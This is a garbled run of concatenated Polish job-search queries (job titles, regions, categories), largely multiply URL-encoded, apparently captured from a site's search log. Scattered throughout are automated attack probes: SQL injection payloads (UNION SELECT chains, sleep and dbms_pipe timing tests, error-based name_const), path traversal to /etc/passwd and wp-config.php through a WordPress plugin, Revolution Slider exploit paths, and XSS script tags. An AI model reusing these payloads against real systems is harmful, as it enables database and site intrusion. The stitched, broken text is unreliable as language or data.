pa%252525c5%25252584stwowshare+a+link+on+twitterpracownik+działu+wędlinymonter statkówczapurytechnik%2btechnologii%2b%c5%bcywno%c5%9bciin%2525c5%2525bcynier jako%2525c5%25259bcimechanik%2bprzemys%25c5%2582owy%252f%2bmonterspecjalista+ds+księgowościmonter+okienpakowanie niemcyochrona dla zwierz%252525c4%25252585tasystent in%c5%bcynierasprzedaż | obsługa klienta warszawaelektronik+%2528m/k%2529+w+zespole+reklamacjipracownik+f niemcyelektryk łódzkiekey+account+manager+%2525252528m/k%2525252529'a=0elektryk%252b%252525252528m/k%252525252529pracownik+montażu+(m/k) bytomprzemys%2525c5%252582+%25257c+produkcja katowicem%25c5%2582odszy+konsultant+ds.+rekrutacji+%2528m/k%2529production+engineerrzeszówcounty dublintechnik elektryk (m/k) niemcyfinanse+%257c+bankowo%25c5%259b%25c4%2587 warszawaprzemysł | produkcja kutnoinformation+technologymedycyna %7c opieka zdrowotnamonter instalacji sanitarnych niemcyin%252525c5%252525bcynier budowy/wp-login.php%2522 or %25281%252c2%2529%253d%2528select%252afrom%2528select name_const%2528char%specjalsita ds. zakupówpracownik produkcji %2528m/k%2529 niemcysprzedaż+|+obsługa+klienta krakówmagazynier (m/k)magazynier,produkcja,kierowca+kat.b mazowieckiepłytkarzserwis+|+technika+|+montażm%2525c5%252582odszy ksi%2525c4%252599gowy warszawakierownik, dyrektorspecjalista%2bds.%2bjako%252525c5%2525259bcipracownik%2bmagazynowytransport%2b%252525257c%2bspedycja%27%26%26sleep%283%29%26%26%271operator%2bw%25252525c3%25252525b3zkaspecjalista ds. obs%25c5%2582ugi klienta-j. niemieckipracownik+biurowy śląskiezakopanenieporętasystent klienta, konsultantchylicewarehouse/wp-login.php%2527a%253d0mistrz+zmiany gdańskmonter%2bkonstrukcji/wp-login.php%27a%3d0/07545460.php%22%2band%2b%22x%22%3d%22y%27a%3d0wykladanie+towaru%d0%a1%d1%82%d1%80%d0%be%d0%b8%d1%82%d0%b5%d0%bb%d1%8c%d1%81%d1%82%d0%b2%d0%be+%7c+%d0%b3%d0%b5%d0%be%d0%b4%d0%b5%d0%b7%d0%b8%d1transport+%7c+spedycja%27a%3d0%27a%3d0monter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0 and 1=1" and "x"="x and 1>1kierownik produkcji pomorskiespecjalista ds.księgowościkontroler+jakości wrocławpracownik powierzchni sprzeda%252525c5%252525bcy/kasjersprzedaż | handeljunior/etc/passwd union all select null,null-- kayhkierowca transport mleka wielkopolskiepraca%2525252b%2525252bfizyczna%2525252bbez%2525252bj%252525252525c4%25252525252599zykapracownik%25252bszklarnista%25c5%25bc hroperator+w%252525c3%252525b3zka+wid%252525c5%25252582owego+hamburgadministracja++pa%c5%84stwowa'a=0opiekunka do os%25c3%25b3b starszych w niemczech bez j%25c4%2599zyka niemcypracownik powierzchni sprzeda%25252525c5%25252525bcykonsultant+ds.+umawiania+spotka%25252525c5%2525252584медицинаpraca na produkcji poznań700monter spawaczzarzeczereferent+ds.+administracji+%2525252528m/k%2525252529konsultant język angielski lublinpraca bez znajomo%2525252525252525c5%25252525252525259bci j%2525252525252525c4%252525252525252599zykaelektryk %2528m/k%2529 pomorskieprzemys%25c5%2582+%257c+produkcja+krojczyksięgowość | audyt | podatki łódzkiekierowca kat c%25%27 and %28select 3950 from%28select count%28%2a%29%2cconcat%280x71717a7071%2c%28select %28elt%283950%3d3950%2technik elektryk/wp-login.php'a=0pracownik+magazynu+bez+doświadczenia łódzkietransport %257c spedycja%22 and %22x%22%3d%22ymedycyna+|+opieka+zdrowotnaaaaaaaaasta%252525252525c5%252525252525bcysta w dziale rekrutacjibez doświadczenia niemcymonter+konstrukcji/wp-login.php%3cbodyonload%3dalert%28%27mysqlerror%27%29%3eadministracja biurowa krakówmonter+konstrukcji//wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php%3ffilename%3d../../../../wp-config.phppraca+biurowaword%2bpresskontrola%2bjako%2525252525252525c5%25252525252525259bcipodw%c3%b3jna+obsada+kierowca+c%2bepraca fizyczna pabianicemanpoweropiekunka+osób+starszych warszawaz%2borzeczeniemspecjalista+ds.+szkole%25252525c5%2525252584image editingbelgiaЛогистика+|+распределение warszawaprodukcja dla niepełnosprawnych union all select null,null,null-- axgloperator+w%25c3%25b3zk%25c3%25b3w+wid%25c5%2582owych szczecinprzemys%c5%82 %7c produkcja sosnowiect%25252525c5%2525252582umaczm%c5%82odszy ksi%c4%99gowytechnik%2belektryk%2b%252528m/k%252529 kujawsko-pomorskiedoradca%252bklientads.%252bszycia%252bna%252bmiar%25c4%2599ojrzeńkadry warszawasta%25252525c5%25252525bcysta w dziale rekrutacjitechnik elektryk %2525252525252528m/k%2525252525252529 polskapieszyceasystent klienta%2c konsultant warszawakierownik utrzymania ruchupraca w muzeumochrona dla zwierz%2525c4%252585tw języku ukraińskimmanager %252525c5%25252582a%252525c5%25252584cucha dostawtransport+%25257c+spedycja+and+1%25253e1specjalista%2bds.%2bszkole%25c5%2584pomocnik%2b%2bw%2b%2b%2bgospodarstwie%2b%2brolnymin%252525c5%252525bcynier budownictwakobyłkadoradztwo %25257c konsulting warszawapracownik+produkcji+praca+dla stanowicekierownik rob%c3%b3t sanitarnychwyk%c5%82adowca angielskiegomonter rega%c5%82%c3%b3wmanager sprzeda%2525c5%2525bcyotmuchówcie%25c5%259bla%2bszalunkowypakowacz bez j%25c4%2599zyka niemcytrainee jobsspecjalista ds. logistyki ŁÓdŹj%25c4%2599zyk francuski warszawaszukam+pracy warszawaoperator+koparki mazowieckieoperator koparkiasystent+klienta%2c+konsultant warszawain%252525c5%252525bcynier elektronik %25252528m/k%25252529medycyna+%2525257c+opieka+zdrowotnatransport+%7c+spedycja%27+and+%27x%27%3d%27xin%c5%bcynieria %7c projektowanie warszawaprodukcja dla niepełnosprawnych%' union all select null,null,null,null,null,null,null,null-- mozbspecjalista+ds.+sprzeda%25c5%25bcy../../../../../etc/passwd wrocławspecjalista ds ubezpiecze%c5%84kierownik gospodarstwabadania i rozw%c3%b3j szczecinmonter konstrukcji/wp-login.php%27a%3d0/07545460.php99999%22 union select unhex%28hex%28version%28%2in%252525c5%252525bcynier+budowy warszawamonter konstrukcji/wp-login.phpa%3d0/07545460.phpkierowca+w%c3%b3zka+wid%c5%82owego warmian-masurian+voivodeshippracownik produkcji - praca dla kobiet i m%25c4%2599%25c5%25bcczyznmonter konstrukcji/wp-admin/admin-ajax.php%3faction%3drevolution-slider_show_image%27a%3d0%27a%3d0sztumoperator mazowieckiesprzeda%c5%bc %7c obs%c5%82uga klienta legnicarejestratorka+medyczna warszawaszkoleń krakówzbieranie zamówieńspawcz aluminiumkontrola jako%c5%9bci sochaczewkierowca kat c';select dbms_pipe.receive_message(chr(103)||chr(80)||chr(90)||chr(76),5) from dual--specjalista bhpprzemysł | produkcja warszawain%25c5%25bcynier%2belektronik%2b%2528m/k%2529pracownik budowlanki gorzów wielkopolskiprzemys%c5%82 %7c produkcja tychyelektryk %2525252528m/k%2525252529kierowca%25252bbes%25252bznajosci%25252bjenzykabadania i rozw%c3%b3jaaaaaaaapraca+w+biurze+z+j%c4%99zykiem+ukrainskimmonter+rurmonter%25252525252fka element%2525252525252525c3%2525252525252525b3w do siedze%2525252525252525c5%252525252525252584 samochodowypart-time teacher../etc/passwd wrocławkontrola%25252525252bjako%2525252525c5%25252525259bci polskamłodszy+ksiegowyagencja+pracy+transfanderms officetechnik informatyk warmińsko-mazurskierolnictwo %25257c ochrona %2525c5%25259brodowiskakonsultant telefonicznyoperator+w%c3%b3zka+wid%c5%82owego skierniewiceochrona+osób+i+mienia krakówmonter+konstrukcji/wp-login.php%2525252527a%252525253d0/07545460.php%2525252527+and+%2525252527x%2525252527%252525253d%252525252inżynier+sanitarnychsztaplerpraca%252b%252bfizyczna%252bbez%252bj%252525252525c4%25252525252599zyka niemcymanager+gastronomiaspecjalista ds. sprzeda%2525c5%2525bcy produkt%2525c3%2525b3w bankowych katowicesprzataczka biurowa śląskiefarmaceutyka %7c biotechnologiapraca fizyczna sprz%c4%85taczka warszawadoradca+techniczny+%2528komponenty+maszyn%2529pracownik+biura warszawatechnolo konstrukcji/enterso.info/wp-login.php%27specjalista%2bds.%2bkadr%2bi%2brekrutacji%2b%252525252528m/k%252525252529drwal pilarz niemcypracownik myjni samochodowej %252528m/k%252529henrykówmonter%25252fka+element%252525c3%252525b3w+do+siedze%252525c5%25252584+samochodowychz+orzeczeniem krakówoperator%252bw%25c3%25b3zk%25c3%25b3w%252bwid%25c5%2582owych polskakontroler+jako%252525c5%2525259bci+%25252528m/k%25252529specjalista ds. księgowości gdańskspecjalista%2bds%2bkar%2bi%2bp%2525c5%252582ac%252527a%25253d0recepcjonista ka węgrówsprzedawca kasjer dębicakierowca%25252bw%25252bwypo%252525c5%252525bcyczalni%25252bsamochodowej%25252b%25252528m%2fk%25252529 niemcy/etc/passwd%25%27+union+all+select+null%2cnull%2cnull%2cnull%2cnull--+xfcodynówŚwidwinpraktyki | stażaaaaaaaasamodzielna księgowa warszawaj%252525c4%25252599zyk w%252525c5%25252582oskipodw%252525c3%252525b3jna obsada kierowca c%2525252bewyk%c5%82adanie towarukierowca++kat+c%'+union+all+select+null,null,null--+tdolart directorkierowca%2b%2528m%2fk%2529%2b%2528kat.%2bc%2be%252c%2bhakowce%2529 niemcynowaopiekunka+do+os%25c3%25b3b+starszych+w+niemczech+bez+j%25c4%2599zyka niemcypomoc%2bprzy%2bpakowaniuadministracja+biurowa sosnowieckierowca++kat+c+and+%28select+3950+from%28select+count%28%2a%29%2cconcat%280x71717a7071%2c%28select+%28elt%283950%3d3950%2c1%29%monter+konstrukcji/wp-login.php'a=0/license.phpprzemys%25c5%2582 %257c produkcja opolskiepracownik+szklarni+z+ogórkami holandialogistyka%2b%25257c%2bdystrybucjapracownik administracyjno-biurowy łódźcustome+servicein%25c5%25bcynier+budowy/wp-login.php"+and+"x"="ynowaopiekunka do osób starszych w niemczech bez języka niemcydo%2bsklepumonter konstrukcji/wp-login.php%2527a%253d0/07545460.php%2522 and %2522x%2522%253d%2522xspecjalista%2bd/s%2bimportu%2b-eksportu%2b%2c%2bobs%c5%82uga%2bklienta%2b%2c%2bar%2b%2c%2bkonsultant%2bz%2bj%c4%99zykiem%2bfrancin%2525c5%2525bcynier jako%2525c5%25259bci w dziale projekt%2525c3%2525b3wpracownik+szklarni+z+og%252525c3%252525b3rkamip%c3%b3%c5%82 etatu warszawamonter+konstrukcji/wp-login.php'a=0sprzedaż | obsługa klienta gorzów wielkopolskitechnik+elektryk+(m/k) francjareferent ds. administracji %25252528m/k%25252529junior+front+endmonter+konstrukcji/wp-login.php%252527a%25253d0/07545460.php+and+1%25253d1montazysta operator pruszkówrzepinpraca pracownicy wykonuj%252525c4%25252585cy prace prosteasystent ds. ksi%252525c4%25252599gowoscikierowca kat c union all select null%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull-- lmmv%2525c5%25259blusarz+spawaczpomoc+nauczyciela warszawaspecjalista ds. kadr i p%252525c5%25252582ac wielkopolskiereferent ds. funduszy europejskich %28m/k%29operator w%2525c3%2525b3zka wid%2525c5%252582owego warszawamanager+sprzeda%c5%bcyzamówień+publicznychspecjalista ds. kadr i p%25c5%2582ac %2528m/k%2529logistyka+%257c+dystrybucja zachodniopomorskieprodukcja dla niepełnosprawnych' union all select null,null,null-- ucbzfinanse warszawamechanik+silników+lotniczych niemcypomoc nauczycielaapteka pczotanie w aptece mielecdoradca+klienta warszawasprzeda%2525c5%2525bc+%25257c+obs%2525c5%252582uga+klientainżynier gdyniapracownik+produkcji+-+praca+dla+kobiet+i+mężczyzn dolnośląskiepraca w holandii szczecinmonter okiinternet+%7c+e-commerceasystent/ka ds. ksi%25c4%2599gowoscipracownik%2bmagazynowy niemcyw%c3%b3zki+wid%c5%82owetechnik+mechanik warszawakierowca kat c union all select concat(concat('qqzpq','dlgzawmngd'),'qbbvq'),14,14,14,14,14,14-- gajwpraca%2bdla%2bosob%2bniepelnosprawnychmonter bateri przemys%c5%82owychin%25252525c5%25252525bcynier+sprzeda%25252525c5%25252525bcywarehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy%2527+or+%25281%252c2%2529%253d%2528select%252afrom%2528select+nasystent/ka%2bds.%2badministracji%2bi%2bobs%25c5%2582ugi%2bklientakierowca+w+wypo%25c5%25bcyczalni+samochodowej+%2528m/k%2529 niemcyserwis+|+technika+|+montaż lublinpraca+fizyczna+bez+jezyka niemcyprzemys%c5%82+%7c+produkcja+krojczy pomorskiekierowca międzynarodowysprzeda%c5%bc %7c obs%c5%82uga klienta/bran%c5%bca elektrotechniczn%c4%85informatyka+programowanie warszawapracownik biurapraca fizyczna bez j%25252525c4%2525252599zyspecjalista ds ksi%c4%99gowo%c5%9bcialuglass+-+realizacja+piotr+kalbarczyk warszawakierowca %252528kat. c%25252be%25252c hakowce%252529monter+konstrukcji/wp-login.php%2527a%253d0/wp-admin/admin-ajax.phppomoc+kuchenna niemcybudownictwo%252525252b%2525252525257c%252525252bgeodezjahuman+resources+|+kadry gliwiceasystent/ka+ds.+księgowosci warszawagrafik pomorskiemarketing+%7c+reklama+%7c+pr warszawaspecjalista ds. księgowości łódzkierecepcjonistkaspecjalista%2bds.%2bp%c5%82ac%2bi%2bkadrpracownik+porz%c4%85dkowy+%28m/k%29kupiec%252b%252528m/k%252529praca fizyczna holandiaspecjalista+d/s+importu+-eksportu+%252c+obs%25c5%2582uga+klienta+%252c+ar+%252c+konsultant+z+j%25c4%2599zykiem+francuskim+%252cutrzymanie ruchu śląskiekierowca+kat.+bpracownik%2bdzia%252525c5%25252582u%2bobs%252525c5%25252582ugi%2bklientadoradca opolepracownik monta%c5%bcu %28m/k%29 bytomtechnolog %c5%bcywnoscimarket research warszawapracownik administracyjno-biurowy z orzeczeniem o niepełnosprawności jaworznokontrola jakości warszawamonter%2525252fka element%25252525c3%25252525b3w do siedze%25252525c5%2525252584 samochodowychprzemys%252525c5%25252582+%2525257c+produkcja wielkopolskienauczyciel j%25c4%2599zyka francuskiegobez znajomo%252525c5%2525259bci j%252525c4%25252599zykapracownik+restauracjigrafik 3dpraca fizyczna sprz%25c4%2585taczka warszawaspecjalista+ds.+obs%c5%82ugi+klienta-j.+niemieckikierownik sprzeda%252525c5%252525bcymonter konstrukcji//wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php%253ffilename%253d../../../../wp-config.phpracownik%2bochrony pomorskiebudownictwo %7ctechnik%2belektryk%2b%2528m/k%2529 polskatechnik%252belektryk%252b%252525252528m/k%252525252529manager+%25c5%2582a%25c5%2584cucha+dostaw warszawapraca+dla+par niemcypracownik+produkcji nysawyk%25c5%2582adanie+towaru warszawakierowca autobusu turystycznogokierowca cepraca%2525252bfizyczna%2525252bw%2525252brolnictwie niemcysekretarka ze znajomo%252525c5%2525259bci%252525c4%25252585 j. niemieckiegopraca+fizyczna+budowlany poznańkierowca+b kujawsko-pomorskiegrafika | fotografia | kreacjaaaaaaaaamagazynier+-+nie+wymagamy+doświadczenia wrocław/etc/passwd%' union all select null,null,null,null,null,null,null,null,null,null-- yfeutransport+%25257c+spedycjaaaaaaaaakierowca gdańskmagazynier%2525252cprodukcja%2525252ckierowca%2bkat.bdoradztwo | konsultingpilarz/drwalprodukcja+dla++niepełnosprawnych+union+all+select+null,null,null,null,null,null#przemysł+|+produkcja krakówenergetyka+|+elektronikapomoc%2bksiegowej/etc/passwd%25%27%3bselect dbms_pipe.receive_message%28chr%2878%29%7c%7cchr%28122%29%7c%7cchr%28103%29%7c%7cchr%2897%29%2c5%29 fin%25c5%25bcynier zak%25c5%2582adu brzeg dolnyprodukcja+dla++niepełnosprawnych'+union+all+select+null,null,null,null,null,null,null,null,null#pracownik%2bpowierzchni%2bsprzeda%c5%bcy/kasjer jawormedia | sztuka | rozrywka poznańsokołów podlaskikierowca++kat+c%25%27+union+all+select+null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull--+dgshspecjalista%2bds.%2bsprzeda%25c5%25bcydoradca techniczny %25252528komponenty maszyn%25252529międzyrzec podlaskimonter konstrukcji/wp-login.php%252527a%25253d0/wp-content/plugins/revslider/temp/update_extract/57758779.phppraca dla osób z orzeczeniem o niepełnosprawnoścista%252525c5%252525bc marketingpracownik dzia%c5%82u w%c4%99dliny/serymonter konstrukcji/wp-login.php%25252527a%2525253d0/07545460.php%25252527 or %252525281%2525252c2%25252529%2525253d%25252528selemechanik+przemys%2525252525c5%252525252582owy/+monterrumiaautomatyk+utrzymania+ruchu małopolskiepraca+fizycznzbudownictwo %25257c geodezja pomocnikpraca+zdalna+-+wprowadzanie+danychspecjalista ds. gis warszawadoradca+ds+nieruchomo%25c5%259bcispecjalista pr warszawamistrz+zmiany, poznańasystent+biurowykupiectechnik%2bkonsultant%2b%252528m/k%252529staż gdańskpracownik dzia%c5%82u produkcjimonterkaprodukcja dla niepełnosprawnych union all select null,null,null,null#bezp%25c5%2582atny+transportpracownik+do+sortowania+owoc%252525252525c3%252525252525b3wlogistyka %7c dystrybucja polandasystent/ka+ds.+księgowosci wrocławtrener siłownimonter+rurociagow norwegiamagazynier+%28m/k%29 opolepracownik magazynuspecjalista%2bds.%2bkadr%2bi%2bp%252525252525c5%25252525252582ac%2b%25252525252528m/k%25252525252529operator w%c3%b3zka wid%c5%82owego belgiafinanse | bankowość warszawawexfordpracownik+działu+produkcjikey account manager %252528m/k%252529'a=0pracownik produkcji %28m/k%29 bytommedia+%257c+sztuka+%257c+rozrywka%2527a%253d0sprzątaczka+w+szkolekopiowanie%2525252c skanowaniepraca%25252bfizyczna%25252bbudowlany niemcypracownik produkcji płońskkierowca kat c union all select null%252cnull%252cnull%252cnull-- hqnopraca+za+granica warszawacustomer%2bservice%2bspecialist%2bwith%2bturkishpracownik fedukacja+|+nauka+|+szkoleniaЛогистика+|+распределениеpraca%2bw%2bdomutłumacz rosyjskiego i angielskiegopraca+dla+emerytabez%2bznajomo%2525c5%25259bci%2bj%2525c4%252599zykakierownik+budowypracownik+magazynowy+-+atrakcyjna+stawka+i+bezpłatny+dojazdspecjalista%2bd/s%2bimportu%2b-eksportu%2b%25252525252c%2bobs%2525252525c5%252525252582uga%2bklienta%2b%25252525252c%2bar%2b%252praca biurowa wielkopolskieczarna wodapomoc%2bksi%25c4%2599gowapracownik administracyjno-biurowy z orzeczeniem o niepe%c5%82nosprawno%c5%9bcipraca fizyczna podkarpackiemagazynier Śląskiebachowicereklamytechnik elektryk (m/k) łódzkieoperator w%25252525c3%25252525b3zk%25252525c3%25252525b3w wid%25252525c5%2525252582owychkierownik+sprzeda%2525c5%2525bcy warszawapomocnik+ogolnobudowlanyspecjalista+ds.+administracjikluczekierowca++kat+c;select+dbms_pipe.receive_message(chr(103)||chr(80)||chr(90)||chr(76),5)+from+dual--image editing warszawaopiekunka do dziecka wrocławbrzeg dolnybadania+i+rozwój szczecinlaborspecjalista+ds+kadr+i+p%25c5%2582ac podkarpackiemonter konstrukcji/wp-login.php%2527a%253d0/wp-admin/wp-admin/admin-ajax.php?action=revslider_show_imagepraca fizyczna bez j%252525c4%25252599zyka niemcyhuman+resources+%257c+kadry warszawamonter konstrukcji/wp-login.php%25252527a%2525253d0specjalista%25252bdpracownik umys%25c5%2582owy bytomz+j%2525c4%252599zykiem+w%2525c5%252582oskimpraca%252bbiurowa%252bz%252bobs%2525c5%252582ug%2525c4%252585%252bklientadębicasprzeda%2525c5%2525bc %25257c obs%2525c5%252582uga klientamonter konstrukcji/wp...//wp-admin/admin-ajax.php%3faction%3drevslider_show_imagespecjalista+ds.+logistyki warszawabankowośćpracownik+ochrony pomorskiemanager+%25c5%2582a%25c5%2584cucha+dostawtransport %257c spedycja%2527a%253d0 warszawamonter+konstrukcji/wp-login.php'a=0/07545460.php"+and+"x"="xpraca%2bfizyczna%2bw%2brolnictwie francjatransport%252b%25257c%252bspedycja%2527%252band%252b%2527x%2527%253d%2527xpraca+za+granicąod zaraztchibospecjalista ds. ksi%2525252525c4%252525252599gowo%2525252525c5%25252525259bcikontrola+jako%2525c5%25259bci sosnowiecit sta%c5%bc'a=0technolog+%25c5%25bcywnosci mazowieckiekierowca+wózka+widłowego warszawapraca+gastronomia warszawaprzedstawiciel+handlowy mazowieckiespecjalista%2bds.%2bkadr%2bi%2bp%25c5%2582ac%2b%2528m/k%2529/etc/passwd%' union all select null,null,null,null,null,null-- fmbvspecjalista ds. ksi%25c4%2599gowo%25c5%259bci warszawaasystentmagazynier%25252525252cprodukcja%25252525252ckierowca kat.bactive directorykierowca+w+wypo%2525252525c5%2525252525bcyczalni+samochodowej+%252525252528m%25252fk%252525252529in%25c5%25bcynier jako%25c5%259bci w dziale projekt%25c3%25b3woprator w%c3%b3zkaspecjalista%20ds.%20kadr%20i%20p%c5%82acgłogówwykładanie towaru radlinin%252525c5%252525bcynier%2bserwisumonter rurociagowkontrola+jako%c5%9bci opolepracownik szklarni z og%2525c3%2525b3rkami holandiamontażysta elementów elektromagnetycznych wrocławtechnik%2belektryk%2b%252528m/k%252529sprzedażypracown ik gospodarczy-kierowcakierownik+budowy pomorskiepraca fizyczna niemcymonter konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3d0 and 1%3d1 and 1%operator+w%25c3%25b3zka+wid%25c5%2582owego+%2528m/k%2529elektronik %252525252528m/k%252525252529 w zespole reklamacjimonter kuchni niemcymonter rusztowa%25c5%2584pomoc+nauczyciela%d0%b2%d0%be%d0%b4%d0%b8%d1%82%d0%b5%d0%bb%d1%8c %d0%ba%d0%b0%d1%82%d0%b5%d0%b3%d0%be%d1%80%d0%b8%d0%b8 bmonter+konstrukcji/wp-login.php%2525252527a%252525253d0/07545460.php+or+%25252525281%252525252c2%2525252529%252525253d%252525252plastyk+malarzhuman+resources+|+kadry dolnośląskiekierowca kat c order by 1-- rslyspecjalista+ds.+ksi%252525c4%25252599gowo%252525c5%2525259bcioperator+w%25252525c3%25252525b3zka+wid%25252525c5%2525252582owego holandiawarehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy%2527 and %2527x%2527%253d%2527ypłatnos ci warszawatechnik+elektronik warszawaprzemysł | produkcja gliwicemechanik+monterpracownik+pomocy+społecznej krakówspecjalista%2bds.%2bplanowania%2bjako%2525c5%25259bci%2b%252528m/k%252529kontrola jako%2525c5%25259bci sosnowiecpraca zdalnbez+znajomo%2525c5%25259bci+j%2525c4%252599zyka niemcypracownik%2bprodukcji%2b-%2bpraca%2bdla%2bkobiet%2bi%2bm%c4%99%c5%bcczyznmonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0' and 'x'='y2121121121212.1internet %7c e-commerce%27a%3d0'a=0 szczecin/etc/passwd' order by 1-- mlcwpani+do+towarzysrwapraca fizyczna sprz%2525c4%252585taczka katowiceoffice%2bassistantkonsultant ds. obs%2525c5%252582ugi klientapraca+w+teatrzemonter+konstrukcji/wp-login.php%2527a%253d0/07545460.php%2527+or+%25281%252c2%2529%253d%2528select%252afrom%2528select+name_consoperator+tekturnicyoperator w%2525252525c3%2525252525b3zka wid%2525252525c5%252525252582owego niemcypraca%2bmobilnakonsultant ds. obs%25c5%2582ug klienta nadministracja%2bpa%25c5%2584stwowpracownik%2bdzia%25c5%2582u%2bhrtechnik%2belektryk%2b%25252528m/k%25252529 polskaopieka osob starszychmonter%252fka element%252525c3%252525b3w do siedze%252525c5%25252584 samochodowych niemcyhr wielkopolskieadministracja pa%c5%84stwowakanieruben+bauambasador markispecjalista ds. p%c5%82ac i kadr%2525252525c5%25252525259blusarz bez jezyka niemcymagazynier%2b-%2bnie%2bwymagamy%2bdo%25c5%259bwiadczeniaпромышленность | производствоjastrzębie zdrójedukacja+%7c+nauka+%7c+szkolenia lublinspecjalista+ds.+obsługi+klienta-j.+niemieckidoradca+klienta+z+językiem+niemieckim warszawapracownik obszaru produkcji %252528m/k%252529 podkarpackiepraca+dla+analityka+hta+%28krak%c3%b3w%29customer service specialist łódzkiemalarz%2bszpachlarzpracown+ik+gospodarczy-kierowca warszawakierowca%2bw%2bwypo%c5%bcyczalni%2bsamochodowej%2b%28m/k%29 niemcysekretarkatransport%2b%257c%2bspedycja%2527a%253d0%2527a%253d0przedstawiciel pomorskietransport %257c spedycja warszawainżynier+budowyautomatyk+utrzymania+ruchu lubelskiepracownik+hali'a=0specjalista%252bds.%252bp%2525c5%252582ac%252bi%252bkadr mazowieckiepakowacz+bez+j%25c4%2599zyka warszawaШвейцарияgame developeroperator%2bw%25c3%25b3zk%25c3%25b3w%2bwid%25c5%2582owychpracownik+powierzchni+sprzedażąmonter/ka elementów do siedzeń samochodowych niemcyopiekunka osób starszych dębicamonter+konstrukcji/wp-login.php%27a%3d0/license.phppracownik inwentaryzacji za granic%c4%85samoch%25c3%25b3d+s%25c5%2582u%25c5%25bcbowykadry i placeelektronik (m/k) w zespole reklamacji wrocławpracownik działu produkcjimontaż instalacji elektrycznych pomorskiehr, kadry'a=0 mazowieckiebetoniarzkonsultant erp śląskieopiekunka+osób+starszych dębicapakowacz bez j%c4%99zyka niemcypracownik biurowy legnicablacharz samochodowy poznańtuszynadministracja+hr warszawadoradca+klienta poznańbez%2bznajomo%2525c5%25259bci%2bj%2525c4%252599zyka niemcyopieka%27 and %27x%27%3d%27xmagazynier,produkcja,kierowca+kat.b warszawadoradca+techniczny+(komponenty+maszyn)logistyka+|+dystrybucja holandiapracownik%252bprodukcji%252b%252525252528m/k%252525252529monter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0 and 1=1</script><script>alert('mj%25c4%2599zyka hiszpa%25c5%2584skiegooperator w%25252525c3%25252525b3zkaspecjalista ds. p%252525c5%25252582ac i kadrprodukcja+dla++niepełnosprawnych+union+all+select+null,null,null,null,null,null,null,null,null--+rdgilogistyka | dystrybucja parzniewpr+managertransport%2b%2525257c%2bspedycjaaaaaaaaaasystent+dzia%2525c5%252582u+zakup%2525c3%2525b3w warszawaopieka warszawalogistyka | dystrybucja poznańca%2525252525c5%252525252582a+polskakierowca%2bkat%2bblogistyka %257c dystrybucjapracownik%2butrzymania%2bczysto%25c5%259bci%2bpolice%252c%2bszczecin%252c%2bpilchowo%252c%2bprz%25c4%2599socin%252c%2bzachodniopdoradca ds. sprzeda%c5%bcy samochod%c3%b3w nowychprodukcja dla niepełnosprawnych%' union all select null,null,null,null,null,null,null#operator w%252525c3%252525b3zka wid%252525c5%25252582owego katowicepraca+w+piekarni pomorskiespecjalista+ds.+obs%c5%82ugi+klienta-j.+niemiecki warszawapracownik%2525252bszklarniprzemys%25c5%2582 %257c produkcja sosnowiect%2525c5%252582umaczin%25c5%25bcynier budowy/wp-login.php%27transport%2b%257c%2bspedycja2121121121212.1manager+%252525c5%25252582a%252525c5%25252584cucha+dostawkierowca%2bw%2bwypo%25c5%25bcyczalni%2bsamochodowej%2b%2528m%2fk%2529hr%25252c+kadryopieka" and "x"="xmagazynier%2525252cprodukcja%2525252ckierowca%2bkat.b mazowieckiespecjalista ds. planowania produkcjilidzbark warmińskibudownictwo%252525252b%25252525252525257c%252525252bgeodezjaadministracja pa%252525c5%25252584stwowasprzedaż+|+handel warszawaelektryk%2b%2525252528m/k%2525252529 pomorskiepracownik hali %2c supersamyspecjalista%2bds.%2brekrutacji%2bi%2bkadrbudownictwo+%7cpraca fizyczna bez j%25c4%2599zykawarehouse/wp-login.php%25252527a%2525253d0%25252527a%2525253d0location%2525253dtychylekarz okulista warszawapraca w magazynie niemcy bez znajomo%25c5%259bci j%25c4%2599zykasamodzielnapraca biurowa z obs%252525c5%25252582ug%252525c4%25252585 klientadoradca+techniczno-handlowy śląskieprzemys%c5%82+%7c+produkcja kujawsko-pomorskieпромышленность | производство garwolinwarehouse/wp-login.php%27a%3d0%27a%3d0location%3dtychy or %281%2c2%29%3d%28select%2afrom%28select name_const%28char%28111%2c108%monter konstrukcji/wp-login.phpa=0/07545460.phpsekretarka+ze+znajomo%2525c5%25259bci%2525c4%252585+j.+angielskiegoin%252525c5%252525bcynier sanitarnychasystent/ka+ds.+administracji+i+obsługi+klienta Łódźspecjalista%20ds%20ubezpiecze%c5%84medycyna %257c lekarz dentistain%25c5%25bcynier%2bserwisudzia%2525c5%252582 obs%2525c5%252582ugi klientainformatyka+programowaniemonter konstrukcji/enterso.infokierowca mi%252525c4%25252599dzynarodowypracownik+księgarni śląskietechnik elektroradiologgorzów wielkopolskispecjalista d/s korekt zuspraca+dorywcza warszawaspawacz 136krakówhr%2525252c kadrykierowca (m/k) (kat. c+e, hakowce) częstochowapraca+biurowa śląskietransport%2b%25252525257c%2bspedycja%252525252527a%25252525253d0%252525252527a%25252525253d0manager sprzedażyniepe%c5%82ny+etat warszawadziale+zakupówin%c5%bcynier jako%c5%9bci w dziale projekt%c3%b3wtransport+%257c+spedycja mazowieckiepraca+na+produkcji kąty+wrocławskiespecjalista+ds.+sprzeda%25252525c5%25252525bcyprodukcja dla niepełnosprawnych' union all select null,concat(0x7170627871,0x586858484a4e58517565,0x717a786a71),null#osoba+sprz%2525c4%252585taj%2525c4%252585capabianicepraca dla ucznia wakacje%2527a%253d0jedlina-zdrójtransport %2525257c spedycjabielskopracownik+szklarni+z+og%2525c3%2525b3rkamimichałowicemonter+konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0"+and+"x"="y+and+1>1praca pomoc księgowej wielkopolskiez%2borzezceniem katowicekierowca c%252525252be lub c1konsultant j%2525252525c4%252525252599zyk 